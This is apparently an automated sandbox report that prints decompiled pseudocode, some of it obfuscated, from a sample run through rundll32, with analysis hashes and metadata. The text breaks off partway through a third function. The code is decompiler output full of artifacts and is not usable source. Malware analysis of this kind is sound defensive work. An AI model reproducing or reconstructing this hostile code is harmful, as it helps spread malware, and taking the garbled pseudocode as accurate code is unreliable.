                				asm("movaps xmm7, xmm0");
                				asm("movss [esp+0x20], xmm0");
                				asm("divss xmm7, xmm1");
                				asm("movaps xmm6, xmm7");
                				asm("mulss xmm6, xmm7");
                				asm("movaps xmm0, xmm6");
                				E00007FFA7FFA535E9704(( *(_t175 + 0x28) & 0x0000ffff) + _t108);
                				asm("movss xmm4, [esp+0x20]");
                				asm("inc esp");
                				asm("movss xmm5, [0x87c49]");
                				asm("movaps xmm3, xmm4");
                				asm("inc ecx");
                				asm("repe inc esp");
                				asm("movd xmm2, eax");
                				asm("repe inc esp");
                				asm("cvtdq2ps xmm2, xmm2");
                				asm("repe inc esp");
                				asm("repe inc ecx");
                				asm("movaps xmm0, xmm3");
                				asm("divss xmm0, xmm5");
                				asm("addss xmm0, xmm2");
                				asm("mulss xmm1, xmm0");
                				asm("movss [esp+0x30], xmm0");
                				asm("movss xmm0, [0x87c2d]");
                				asm("comiss xmm0, xmm1");
                				asm("movss [esp+0x2c], xmm1");
                				if (_t122 <= 0) goto 0x535ea0af;
                				r14d = r15w & 0xffffffff;
                				goto 0x535ea2fa;
                				asm("comiss xmm1, [0x87c0a]");
                				if (_t122 < 0) goto 0x535ea123;
                				asm("movss xmm0, [0x87bec]");
                				asm("comiss xmm0, xmm1");
                				if (_t122 < 0) goto 0x535ea123;
                				asm("inc esp");
                				if (_t122 <= 0) goto 0x535ea123;
                				asm("movss xmm0, [0x87bdd]");
                				asm("inc ecx");
                				if (_t122 <= 0) goto 0x535ea123;
                				asm("inc esp");
                				if (_t122 <= 0) goto 0x535ea0ed;
                				asm("subss xmm1, [0x86e0d]");
                				goto 0x535ea0f5;
                				asm("addss xmm1, [0x86e03]");
                				asm("repe inc ecx");
                				asm("repe inc esp");
                				asm("repe inc ecx");
                				asm("inc cx");
                				asm("cvtdq2ps xmm0, xmm0");
                				asm("subss xmm2, xmm0");
                				asm("mulss xmm2, xmm5");
                				asm("addss xmm3, xmm2");
                				asm("movss [esp+0x2c], xmm3");
                				goto 0x535ea2d1;
                				asm("comiss xmm1, [0x87b8e]");
                				if (_t122 > 0) goto 0x535ea2fa;
                				asm("movaps xmm2, xmm4");
                				E00007FFA7FFA535E9DF0(0x8000, 4, 4, _t111, __ebp, _t140, _t172 - 0x69, _t175 + 0x20, _t167, _t172, __r10);
                				_t16 = _t165 - 2; // 0x2
                				_t79 = _t16;
                				asm("inc ecx");
                				E00007FFA7FFA535E9DF0(_t79, _t79, 4, _t111, __ebp, _t140, _t175 + 0x38, _t164, _t167, _t172, __r10);
                				r9d = _t79;
                				E00007FFA7FFA535E9B4C(4, _t140, _t172 - 0x69, _t165, _t167, _t172, _t175 + 0x38, _t188, _t186);
                				asm("movss xmm2, [ebp-0x69]");
                				asm("inc ecx");
                				if (_t122 != 0) goto 0x535ea187;
                				if (_t122 != 0) goto 0x535ea187;
                				asm("inc ecx");
                				_t63 = E00007FFA7FFA535E9DF0(_t79, 4, 4, _t111, _t112, _t140, _t172 - 0x59, _t164, _t167, _t172, __r10);
                				goto 0x535ea1e8;
                				asm("movups xmm0, [0x87a92]");
                				asm("movdqu [ebp-0x59], xmm0");
                				_t64 = E00007FFA7FFA535E9C0C(_t63, 4, 4, _t111, _t112, _t140, _t172 - 0x59, _t164, __r10);
                				r15d = r14d;
                				_t168 = _t172 - 0x65;
                				asm("movss xmm2, [esi]");
                				asm("inc ecx");
                				if (_t122 != 0) goto 0x535ea1b1;
                				if (_t122 == 0) goto 0x535ea1e5;
                				asm("movups xmm0, [0x87a68]");
                				asm("movdqu [ebp-0x49], xmm0");
                				E00007FFA7FFA535E9C0C(_t64, 4, 4, _t111, _t112, _t140, _t172 - 0x49, _t164, _t181);
                				r9d = 4;
                				E00007FFA7FFA535E9B4C(4, _t140, _t172 - 0x59, _t165, _t168, _t172, _t172 - 0x49, _t183, _t165);
                				r15d = r15d + r14d;
                				_t169 = _t168 + _t165;
                				_t123 = r15d - 4;
                				if (_t123 < 0) goto 0x535ea1a5;
                				r15d = 0;
                				asm("movd xmm2, eax");
                				asm("cvtdq2ps xmm2, xmm2");
                				E00007FFA7FFA535E97F8(_t79, r14d, 4, 4, _t111, _t112, _t172 - 0x59, _t164, _t181);
                				asm("inc ecx");
                				_t69 = E00007FFA7FFA535E9DF0(_t79, _t79, 4, _t111, _t112, _t140, _t172 - 0x69, _t164, _t168 + _t165, _t172, _t181);
                				asm("movaps xmm0, [ebp-0x59]");
                				asm("movss xmm2, [ebp-0x69]");
                				asm("movdqa [ebp-0x79], xmm0");
                				_t70 = E00007FFA7FFA535E9C0C(_t69, 4, 4, _t111, _t112, _t140, _t172 - 0x79, _t164, _t181);
                				asm("movss xmm2, [ebp-0x65]");
                				asm("inc ecx");
                				if (_t123 != 0) goto 0x535ea234;
                				if (_t123 == 0) goto 0x535ea25a;
                				asm("movaps xmm0, [ebp-0x59]");
                				asm("movdqa [ebp-0x49], xmm0");
                				E00007FFA7FFA535E9C0C(_t70, 4, 4, _t111, _t112, _t140, _t172 - 0x49, _t164, _t181);
                				r9d = 4;
                				_t72 = E00007FFA7FFA535E9B4C(4, _t140, _t172 - 0x79, _t165, _t168 + _t165, _t172, _t172 - 0x49, _t167, _t171);
                				asm("movss xmm1, [ebp-0x79]");
                				asm("inc ecx");
                				asm("movss [esp+0x20], xmm1");
                				if (_t123 != 0) goto 0x535ea26d;
                				if (_t123 == 0) goto 0x535ea28d;
                				asm("movss xmm2, [ebp-0x75]");
                				asm("inc ecx");
                				if (_t123 != 0) goto 0x535ea27a;
                				if (_t123 == 0) goto 0x535ea28d;
                				asm("movss xmm0, [ebp-0x71]");
                				asm("addss xmm0, xmm2");
                				asm("addss xmm0, xmm1");
                				asm("movss [esp+0x20], xmm0");
                				E00007FFA7FFA535E8FAC(_t72, r14d, 0, _t175 + 0x20, _t164, _t165, _t168 + _t165, _t172 - 0x49);
                				asm("movss xmm2, [esp+0x20]");
                				asm("xorps xmm2, [0x866a6]");
                				_t74 = E00007FFA7FFA535E9BBC(E00007FFA7FFA535E97F8(_t79, _t83, 4, 4, _t111, _t112, _t172 - 0x79, _t164, _t181), _t164);
                				asm("mulss xmm0, [0x879dc]");
                				asm("repe inc esp");
                				asm("movss [esp+0x2c], xmm0");
                				if (__r8 == 0) goto 0x535ea2de;
                				 *__r8 = r8w;
                				r8d = r15d;
                				asm("movss xmm1, [0x8664e]");
                				_t75 = E00007FFA7FFA535F0DCC(_t74, _t79, 4, _t112, _t140, _t175 + 0x2c, _t165, _t168 + _t165, _t181);
                				asm("movss xmm1, [esp+0x2c]");
                				r14d = _t75 & 0x0000ffff;
                				_t84 = r14w;
                				if (_t84 == 0) goto 0x535ea31c;
                				if (_t84 != 1) goto 0x535ea331;
                				asm("movss xmm0, [0x878b9]");
                				asm("movss [esp+0x2c], xmm0");
                				goto 0x535ea326;
                				 *(_t175 + 0x2c) =  *(_t175 + 0x2c) & 0x00000000;
                				_t76 = E00007FFA7FFA535E90CC(_t75, _t79, 0x10, 4, 4, _t138 ^ _t175, _t140, _t175 + 0x2c);
                				asm("movss xmm1, [esp+0x2c]");
                				if (r13w == 0) goto 0x535ea34a;
                				asm("xorps xmm1, [0x86612]");
                				goto 0x535ea34a;
                				if (4 != 2) goto 0x535ea34f;
                				asm("movaps xmm0, xmm1");
                				goto 0x535ea3ae;
                				if (_t111 != 2) goto 0x535ea35a;
                				asm("inc ecx");
                				goto 0x535ea3ae;
                				if (4 != r14w) goto 0x535ea41f;
                				if (( *(_t175 + 0x22) & 0x00008000) != 0) goto 0x535ea385;
                				if (( *(_t172 - 0x7f) & 0x00008000) != 0) goto 0x535ea37f;
                				asm("repe inc esp");
                				asm("inc ecx");
                				goto 0x535ea3ae;
                				if (( *(_t172 - 0x7f) & 0x00008000) != 0) goto 0x535ea3ee;
                				if (_t111 != 0) goto 0x535ea3a6;
                				E00007FFA7FFA535E8FAC(_t76, 0x10, 0xffffffff, _t175 + 0x30, _t164, _t165, _t169, _t172 - 0x49);
                				if (_t76 < 0) goto 0x535ea4ad;
                				asm("movss xmm0, [0x8781a]");
                				E00007FFA7FFA535F51E0();
                				asm("inc ecx");
                				asm("inc ecx");
                				asm("inc ebp");
                				asm("inc ebp");
                				asm("inc ebp");
                				return _t76;
                			}









































                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: _fdexp_fdlogpoly
                • String ID:
                • API String ID: 4114727879-0
                • Opcode ID: 2849e88e75b85d9acbfc01c0a23c984c94bd6e59bb1f6be8716bfb0e62402709
                • Instruction ID: 5f67408cdf0219c8606eb718ec710c0152b2bcaedf3093fcc1713914f08f279c
                • Opcode Fuzzy Hash: 2849e88e75b85d9acbfc01c0a23c984c94bd6e59bb1f6be8716bfb0e62402709
                • Instruction Fuzzy Hash: 31021626E28F4689F6229B3684410B96367AFEF344F1CE771ED4D324E5EF2CB545A600
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 66%
                			E00007FFA7FFA535F9C34() {
                				signed int _t334;
                				signed int _t365;
                				void* _t415;
                				void* _t422;
                				signed long long _t428;
                				signed long long _t430;
                				signed long long _t441;
                				signed long long _t465;
                				long long _t468;
                				long long _t469;
                				long long _t473;
                				intOrPtr _t474;
                				long long _t480;
                				intOrPtr _t483;
                				signed long long _t517;
                				void* _t518;
                				void* _t568;
                				intOrPtr _t569;
                				void* _t587;
                				signed long long _t588;
                				void* _t591;
                				void* _t592;
                				void* _t593;
                				void* _t594;
                				void* _t595;
                				intOrPtr _t602;
                				void* _t605;
                				void* _t612;
                				signed long long _t613;
                				int _t614;
                				signed long long _t615;
                				signed long long _t616;
                
                				 *(_t592 + 8) = _t517;
                				_push(_t588);
                				_push(_t587);
                				_push(_t613);
                				_t593 = _t592 - 0x70;
                				_t591 = _t518;
                				 *((intOrPtr*)(_t593 + 0x60)) = _t568 - 0x94;
                				r14d = _t594 + 0x956;
                				r10d = _t605 - 0x1582;
                				 *((intOrPtr*)(_t593 + 0xb8)) = _t568 - 0x40c;
                				 *((intOrPtr*)(_t593 + 0xc8)) =  *((intOrPtr*)(_t593 + 0xe0)) + 0x761;
                				r11d = _t568 - 0x15fd;
                				 *((intOrPtr*)(_t593 + 0xe0)) = _t568 - 0x54f;
                				r9d = r9d + 0xfffffd9e;
                				 *((intOrPtr*)(_t593 + 0xc0)) =  *((intOrPtr*)(_t593 + 0xf8)) + 0xffffe932;
                				r8d = r10d;
                				 *((intOrPtr*)(_t593 + 0x50)) = r11d;
                				 *(_t593 + 0x5c) = r9d;
                				 *((intOrPtr*)(_t593 + 0x64)) = _t422 - 0xfec;
                				 *((intOrPtr*)(_t593 + 0xe8)) = _t568 - 0xe8;
                				r15d = _t568 - 0x176;
                				r13d = _t568 - 0x2a8;
                				if (r11d == _t615 - 0x70) goto 0x535fa66f;
                				r15d = 0x12ad;
                				_t27 = _t588 + 0x7b; // 0x15fd
                				r12d = _t27;
                				if (r13d - _t517 + 0x6f2 < 0) goto 0x535f9efc;
                				_t29 = _t517 - 0x70; // 0x1ad7
                				r9d = _t29;
                				r8d = 0x1fda;
                				 *((long long*)(_t593 + 0x40)) = 0x535fc300;
                				 *((char*)(_t593 + 0x38)) = 0x93;
                				 *((char*)(_t593 + 0x30)) = 0x2d;
                				 *((intOrPtr*)(_t593 + 0x28)) = 5;
                				 *(_t593 + 0x20) =  *((intOrPtr*)( *((intOrPtr*)(_t591 + 0x110)) + 0x68)) - 0x12e2;
                				 *((intOrPtr*)(_t591 + 0x45c)) = E00007FFA7FFA535E23C8(r15d, _t517, _t591, _t568);
                				_t37 = _t517 + 0x60; // 0x1ba7
                				r9d = _t37;
                				r8d = 0x145c;
                				 *(_t591 + 0x1b8) = 0x535fc300;
                				 *((long long*)(_t593 + 0x40)) = 0x53603760;
                				 *((char*)(_t593 + 0x38)) = 0xf9;
                				 *((char*)(_t593 + 0x30)) = 0x4a;
                				 *((intOrPtr*)(_t593 + 0x28)) =  *((intOrPtr*)(_t591 + 0x70)) - 0x1482;
                				 *(_t593 + 0x20) =  *((intOrPtr*)( *((intOrPtr*)(_t591 + 0x160)) + 0x1b0)) + 0x6a446;
                				 *((intOrPtr*)(_t591 + 0x45c)) = E00007FFA7FFA535E23C8(0x1582, _t517, _t591, _t568);
                				_t48 = _t517 + 0x60; // 0x1ba7
                				r9d = _t48;
                				r8d = 0x1b47;
                				 *(_t591 + 0x1b8) = 0x53603760;
                				_t428 =  *((intOrPtr*)(_t591 + 0x108));
                				 *(_t428 + 0x80) =  *( *((intOrPtr*)(_t591 + 0x2a0)) + 0x5e8) | _t613;
                				 *((long long*)(_t593 + 0x40)) = 0x536a2090;
                				 *((char*)(_t593 + 0x38)) = 0x3b;
                				 *((char*)(_t593 + 0x30)) = 0x62;
                				 *((intOrPtr*)(_t593 + 0x28)) = 4;
                				 *(_t593 + 0x20) =  *((intOrPtr*)(_t591 + 0x340)) + 0xb0ea7;
                				 *((intOrPtr*)(_t591 + 0x45c)) = E00007FFA7FFA535E23C8(0x651, _t517, _t591, _t568);
                				r9d = 0x145c;
                				 *(_t591 + 0x1b8) = _t428;
                				r8d = r12d;
                				 *((long long*)(_t593 + 0x40)) = 0x5367c070;
                				_t430 =  *((intOrPtr*)(_t591 + 0x108)) + 0x3c0;
                				 *(_t591 + 0x300) = _t430;
                				 *((char*)(_t593 + 0x38)) = 0x67;
                				 *((char*)(_t593 + 0x30)) = 0xb6;
                				 *((intOrPtr*)(_t593 + 0x28)) =  *((intOrPtr*)(_t591 + 0x1b0)) - 0x1fd7;
                				 *(_t593 + 0x20) = 0x26020;
                				 *((intOrPtr*)(_t591 + 0x45c)) = E00007FFA7FFA535E23C8(0x1355, _t517, _t591, _t568);
                				 *(_t591 + 0x1b8) = _t430;
                				 *((long long*)(_t593 + 0x40)) = 0x535ffe30;
                				 *((char*)(_t593 + 0x38)) = 0x6c;
                				r9d = 0x145c;
                				 *((char*)(_t593 + 0x30)) = 0x22;
                				r8d = 0x1b47;
                				 *((intOrPtr*)(_t593 + 0x28)) = 8;
                				 *(_t593 + 0x20) =  *((intOrPtr*)( *((intOrPtr*)(_t591 + 0x240)) + 0x1b0)) + 0x1956;
                				 *((intOrPtr*)(_t591 + 0x45c)) = E00007FFA7FFA535E23C8(0x16ce, _t517, _t591, _t568);
                				r12d = 0x10ae;
                				 *(_t591 + 0x1b8) =  *((intOrPtr*)(_t591 + 0x45c));
                				r9d = 0x1b47;
                				r8d = 0x1355;
                				 *((long long*)(_t593 + 0x40)) = 0x535fe190;
                				 *((char*)(_t593 + 0x38)) = 0xbe;
                				 *((char*)(_t593 + 0x30)) = 0xfa;
                				 *((intOrPtr*)(_t593 + 0x28)) =  *( *((intOrPtr*)(_t591 + 0x2a0)) + 0x70) - 0x147f;
                				 *(_t593 + 0x20) = 0x1c98;
                				 *((intOrPtr*)(_t591 + 0x45c)) = E00007FFA7FFA535E23C8(r12d, _t517, _t591, _t568);
                				r9d = r15d;
                				r8d = 0x1487;
                				 *(_t591 + 0x1b8) = 0x535fe190;
                				 *((intOrPtr*)( *((intOrPtr*)(_t591 + 0x2a0)) + 0x138)) =  *((intOrPtr*)( *((intOrPtr*)(_t591 + 0x2a0)) + 0x138)) - ( *( *((intOrPtr*)(_t591 + 0x2a0)) + 0x108) ^ 0x00001ba7);
                				 *((long long*)(_t593 + 0x40)) = 0x535fc5a0;
                				 *((char*)(_t593 + 0x38)) = 0xd3;
                				 *((char*)(_t593 + 0x30)) = 0xb3;
                				 *((intOrPtr*)(_t593 + 0x28)) =  *((intOrPtr*)(_t591 + 0x340)) - 0x11e9;
                				 *(_t593 + 0x20) =  *( *((intOrPtr*)(_t591 + 0x240)) + 0x70) ^ 0x00000f63;
                				 *((intOrPtr*)(_t591 + 0x45c)) = E00007FFA7FFA535E23C8(0x11f1, _t517, _t591, _t568);
                				_t415 =  *((intOrPtr*)(_t593 + 0xe8)) - _t615 - 0x5c5;
                				if (_t415 == 0) goto 0x535faa1f;
                				_t595 = _t591;
                				_t365 =  *( *((intOrPtr*)(_t591 + 0x240)) + 0x70) + 0xb0daf;
                				_t441 = _t365;
                				 *(_t591 + 0xe0) = _t365;
                				 *(_t591 + 0x1b8) = _t441;
                				_t334 = E00007FFA7FFA535E229C(_t517, _t568, _t588, _t591, _t595);
                				 *(_t591 + 0xb8) = _t441;
                				r9d = 0;
                				r10d = 0xb0daf;
                				 *(_t591 + 0x460) =  *((intOrPtr*)( *((intOrPtr*)(_t591 + 0x108)) + 0x2a8)) - 0x2114;
                				 *((long long*)( *((intOrPtr*)(_t591 + 0x2a0)) + 0x448)) = 0x269c284;
                				_t569 =  *((intOrPtr*)(_t591 + 0x108));
                				 *(_t591 + 0x190) =  *(_t569 + 0x340) * 0x145c;
                				 *((intOrPtr*)(_t591 + 0x310)) =  *((intOrPtr*)(_t591 + 0x310)) - ( *(_t569 + 0x330) ^ 0x00001ec0);
                				 *(_t569 + 0x88) =  *(_t569 + 0x88) * ( *((intOrPtr*)(_t591 + 0x4b8)) - 0xc92);
                				if (_t415 == 0) goto 0x535fa172;
                				r8d = 0;
                				r9d = r9d + 1;
                				 *(_t595 +  *(_t591 + 0xb8)) =  *( *(_t591 + 0x460) +  *((intOrPtr*)(_t591 + 0x30))) ^  *(_t595 +  *((intOrPtr*)(_t591 + 0x78)));
                				 *( *((intOrPtr*)(_t591 + 0x160)) + 0x128) =  *( *((intOrPtr*)(_t591 + 0x160)) + 0x128) |  *((intOrPtr*)(_t591 + 0x358)) + 0x000002e0;
                				 *( *((intOrPtr*)(_t591 + 0x20)) + 0x140) =  *( *((intOrPtr*)(_t591 + 0x108)) + 0x230) | _t613;
                				 *(_t591 + 0x460) = _t334 %  *(_t591 + 0x60);
                				 *(_t591 + 0x130) =  *(_t591 + 0x130) |  *((intOrPtr*)(_t591 + 0x358)) + 0x00000248;
                				if (r9d -  *( *((intOrPtr*)(_t591 + 0x2a0)) + 0x70) + _t612 < 0) goto 0x535fa0b8;
                				r8d = 0x15fd;
                				 *(_t591 + 0x1b8) =  *((intOrPtr*)(_t591 + 0x78));
                				E00007FFA7FFA535FAF30(0x1355, _t517, _t616, _t588, _t591, _t591);
                				r14d = 0x1ad7;
                				_t465 =  *((intOrPtr*)(_t591 + 0x1b0)) + 0x103892;
                				 *(_t591 + 0x1b8) = _t465;
                				E00007FFA7FFA535E229C(_t517, _t616, _t588, _t591, _t591);
                				 *(_t591 + 0x650) = _t465;
                				 *((intOrPtr*)( *((intOrPtr*)(_t591 + 0x2a0)) + 0x310)) =  *((intOrPtr*)( *((intOrPtr*)(_t591 + 0x2a0)) + 0x310)) + ( *( *((intOrPtr*)(_t591 + 0x358)) + 0x110) | _t616);
                				 *((long long*)( *((intOrPtr*)(_t591 + 0x20)) + 0x320)) =  *((long long*)( *((intOrPtr*)(_t591 + 0x20)) + 0x320)) + 0xfee50c5b;
                				_t468 =  *((intOrPtr*)(_t591 + 0x20));
                				 *(_t591 + 0x330) =  *(_t591 + 0x330) ^ ( *(_t468 + 0x110) | _t588);
                				E00007FFA7FFA535E229C(_t517, _t616, _t588, _t591, _t591);
                				 *((long long*)(_t591 + 0x658)) = _t468;
                				_t469 =  *((intOrPtr*)(_t591 + 0x358));
                				 *(_t591 + 0x1b8) =  *((intOrPtr*)(_t469 + 0x2a8)) + 0x3f507;
                				E00007FFA7FFA535E229C(_t517, _t616, _t588, _t591, _t591);
                				 *((long long*)(_t591 + 0x660)) = _t469;
                				 *((intOrPtr*)( *((intOrPtr*)(_t591 + 0x20)) + 0x418)) =  *((intOrPtr*)( *((intOrPtr*)(_t591 + 0x20)) + 0x418)) + ( *( *((intOrPtr*)(_t591 + 0x160)) + 0x70) | 0x0000145c);
                				 *(_t591 + 0x1b8) =  *(_t591 + 0x148) ^ 0x0010a917;
                				_t473 =  *((intOrPtr*)(_t591 + 0x110));
                				 *((intOrPtr*)( *((intOrPtr*)(_t591 + 0x240)) + 0x398)) =  *((intOrPtr*)( *((intOrPtr*)(_t591 + 0x240)) + 0x398)) - ( *(_t473 + 0x250) ^ _t517);
                				E00007FFA7FFA535E229C(_t517,  *((intOrPtr*)(_t591 + 0x240)), _t588, _t591, _t591);
                				 *((long long*)(_t591 + 0x668)) = _t473;
                				_t474 =  *((intOrPtr*)(_t591 + 0x160));
                				_t589 = _t588 -  *((intOrPtr*)(_t474 + 0x110));
                				 *((intOrPtr*)(_t591 + 0x170)) =  *((intOrPtr*)(_t591 + 0x170)) + _t588 -  *((intOrPtr*)(_t474 + 0x110));
                				 *((intOrPtr*)( *((intOrPtr*)(_t591 + 0x5e8)) + 0x138)) =  *((intOrPtr*)( *((intOrPtr*)(_t591 + 0x5e8)) + 0x138)) +  *( *((intOrPtr*)(_t591 + 0x358)) + 0x110) + 0x651;
                				 *(_t591 + 0x1b8) =  *((intOrPtr*)( *((intOrPtr*)(_t591 + 0x2a0)) + 0x148)) + 0x10a0ab;
                				_t602 =  *((intOrPtr*)(_t591 + 0x20));
                				_t575 =  *((intOrPtr*)(_t591 + 0x240));
                				 *(_t591 + 0x130) =  *(_t591 + 0x130) + 0xffffeb79 -  *((intOrPtr*)(_t602 + 0x250));
                				 *( *((intOrPtr*)(_t591 + 0x240)) + 0x188) =  *( *((intOrPtr*)(_t591 + 0x240)) + 0x188) |  *(_t602 + 0x248);
                				_t480 =  *((intOrPtr*)(_t591 + 0x20));
                				 *((long long*)(_t480 + 0x248)) =  *((long long*)(_t480 + 0x248)) - 1;
                				E00007FFA7FFA535E229C(_t517,  *((intOrPtr*)(_t591 + 0x240)), _t588 -  *((intOrPtr*)(_t474 + 0x110)), _t591, _t591);
                				 *((long long*)(_t591 + 0x680)) = _t480;
                				 *( *((intOrPtr*)(_t591 + 0x108)) + 0x248) =  *( *((intOrPtr*)(_t591 + 0x108)) + 0x248) *  *( *((intOrPtr*)(_t591 + 0x108)) + 0x1c8);
                				_t483 =  *((intOrPtr*)(_t591 + 0x108));
                				 *((long long*)(_t483 + 0x1c8)) =  *((long long*)(_t483 + 0x1c8)) + 1;
                				if ( *(_t591 + 0x650) == _t483) goto 0x535fa60b;
                				if ( *((intOrPtr*)(_t591 + 0x658)) == _t483) goto 0x535fa60b;
                				if ( *((intOrPtr*)(_t591 + 0x660)) == _t483) goto 0x535fa60b;
                				if ( *((intOrPtr*)(_t591 + 0x680)) == _t483) goto 0x535fa60b;
                				 *(_t591 + 0x300) =  *(_t591 + 0x300) | 0xfffff53b;
                				 *((long long*)( *((intOrPtr*)(_t591 + 0x2a0)) + 0x5d8)) =  *((intOrPtr*)( *((intOrPtr*)(_t591 + 0x358)) + 0x5d8)) + _t613;
                				 *( *((intOrPtr*)(_t591 + 0x160)) + 0xa8) =  *( *((intOrPtr*)(_t591 + 0x160)) + 0xa8) |  *((intOrPtr*)(_t591 + 0x108)) + 0x00000250;
                				 *((intOrPtr*)(_t591 + 0x648)) =  *((intOrPtr*)( *((intOrPtr*)(_t591 + 0x20)) + 0x340)) - 0x11f1;
                				 *(_t591 + 0x674) =  *( *((intOrPtr*)(_t591 + 0x5e8)) + 0x2a8) ^ 0x00002114;
                				 *((long long*)( *((intOrPtr*)(_t591 + 0x358)) + 0x140)) =  *((intOrPtr*)(_t591 + 0x160)) + 0x50;
                				r9d =  *( *((intOrPtr*)(_t591 + 0x2a0)) + 0x70);
                				r9d = r9d ^ 0x00001487;
                				 *(_t591 + 0x670) = r9d;
                				r9d =  *( *((intOrPtr*)(_t591 + 0x240)) + 0x70);
                				r9d = r9d - 0x1487;
                				 *(_t591 + 0x678) = r9d;
                				E00007FFA7FFA535E27D4( *( *((intOrPtr*)(_t591 + 0x5e8)) + 0x2a8) ^ 0x00002114, 0x1355, _t517, _t591,  *((intOrPtr*)(_t591 + 0x240)), _t587, _t588 -  *((intOrPtr*)(_t474 + 0x110)), _t591, _t616, _t615);
                				 *(_t591 + 0x1b8) =  *(_t591 + 0xb8);
                				r8d = 0x145c;
                				 *(_t591 + 0x330) = _t591 + 0x238;
                				E00007FFA7FFA535FAF30(0x1fda, _t517, _t575, _t588 -  *((intOrPtr*)(_t474 + 0x110)), _t591, _t591);
                				r8d = 0x1355;
                				 *( *((intOrPtr*)(_t591 + 0x358)) + 0x298) =  *( *((intOrPtr*)(_t591 + 0x240)) + 0x2f8) * 0x1355;
                				 *((long long*)( *((intOrPtr*)(_t591 + 0x108)) + 0x2f8)) = 0xf0cb9d;
                				 *( *((intOrPtr*)(_t591 + 0x358)) + 0x338) =  *( *((intOrPtr*)(_t591 + 0x358)) + 0x338) * ( *( *((intOrPtr*)(_t591 + 0x5e8)) + 0xc8) ^ _t517);
                				 *(_t591 + 0xb8) =  *((intOrPtr*)(_t591 + 0x680));
                				 *(_t591 + 0xe0) =  *(_t591 + 0x678);
                				 *( *((intOrPtr*)(_t591 + 0x358)) + 0x38) =  *(_t591 + 0x490) ^ _t615;
                				 *((intOrPtr*)( *((intOrPtr*)(_t591 + 0x5e8)) + 0x2d0)) =  *((intOrPtr*)( *((intOrPtr*)(_t591 + 0x5e8)) + 0x2d0)) +  *((intOrPtr*)(_t591 + 0x160)) + 0x470;
                				 *(_t591 + 0x1b8) =  *(_t591 + 0x650);
                				E00007FFA7FFA535FAF30(r12d, _t517,  *((intOrPtr*)(_t591 + 0x5e8)), _t588 -  *((intOrPtr*)(_t474 + 0x110)), _t591, _t591);
                				 *(_t591 + 0x188) =  *(_t591 + 0x188) ^ 0x000017fd;
                				r8d = r15d;
                				 *( *((intOrPtr*)(_t591 + 0x2a0)) + 0x2f8) =  *( *((intOrPtr*)(_t591 + 0x2a0)) + 0x2f8) * ( *((intOrPtr*)( *((intOrPtr*)(_t591 + 0x108)) + 0x1c0)) + _t517);
                				 *( *((intOrPtr*)(_t591 + 0x2a0)) + 0x4b0) =  *( *((intOrPtr*)(_t591 + 0x2a0)) + 0x4b0) ^  *( *((intOrPtr*)(_t591 + 0x20)) + 0x250) * 0x0000181f;
                				 *(_t591 + 0x1b8) =  *((intOrPtr*)(_t591 + 0x658));
                				E00007FFA7FFA535FAF30(0x2114, _t517,  *( *((intOrPtr*)(_t591 + 0x20)) + 0x250) * 0x181f, _t589, _t591, _t591);
                				 *(_t591 + 0x1b8) =  *((intOrPtr*)(_t591 + 0x660));
                				goto 0x535faa1f;
                				 *((intOrPtr*)( *((intOrPtr*)(_t591 + 0x240)) + 0x88)) =  *((intOrPtr*)( *((intOrPtr*)(_t591 + 0x240)) + 0x88)) +  *((intOrPtr*)( *((intOrPtr*)(_t591 + 0x2a0)) + 0xd8));
                				 *((long long*)( *((intOrPtr*)(_t591 + 0x2a0)) + 0xd8)) =  *((long long*)( *((intOrPtr*)(_t591 + 0x2a0)) + 0xd8)) - 1;
                				 *( *((intOrPtr*)(_t591 + 0x20)) + 0x398) =  *(_t591 + 0x38) | 0x00001487;
                				 *( *((intOrPtr*)(_t591 + 0x20)) + 0x2f8) =  *( *((intOrPtr*)(_t591 + 0x20)) + 0x2f8) |  *((intOrPtr*)(_t591 + 0x358)) + 0x00000420;
                				ExitProcess(_t614);
                			}


                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: ErrorExitLastProcess
                • String ID: "$l
                • API String ID: 1697593849-1902413641
                • Opcode ID: e2cbf89bb53dce2e131af234cb79d2131a62c9941148f64ecddd86636c798de7
                • Instruction ID: cd5baadae114abc6e4a7196865bad12ebe7b3db0d04e6322fc4eb476dea4534b
                • Opcode Fuzzy Hash: e2cbf89bb53dce2e131af234cb79d2131a62c9941148f64ecddd86636c798de7
                • Instruction Fuzzy Hash: EB721472614BC48AD774CF29D8847E937A9F789B88F44412ADB8D4BB68DF38D254CB00
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 69%
                			E00007FFA7FFA535E1488(long long _a8, signed int _a16, signed int _a24, signed int _a32) {
                				signed int _v64;
                				signed int _v68;
                				signed int _v72;
                				signed int _v76;
                				signed int _v80;
                				signed int _v84;
                				signed int _v88;
                				signed int _v104;
                				signed int _v112;
                				signed int _v120;
                				signed int _v128;
                				signed int _v136;
                				signed int _v144;
                				signed int _v152;
                				void* _t298;
                				signed int _t306;
                				void* _t359;
                				void* _t410;
                				void* _t418;
                				intOrPtr _t429;
                				long long _t463;
                				signed int _t470;
                				long long _t485;
                				long long _t563;
                				long long _t564;
                				void* _t566;
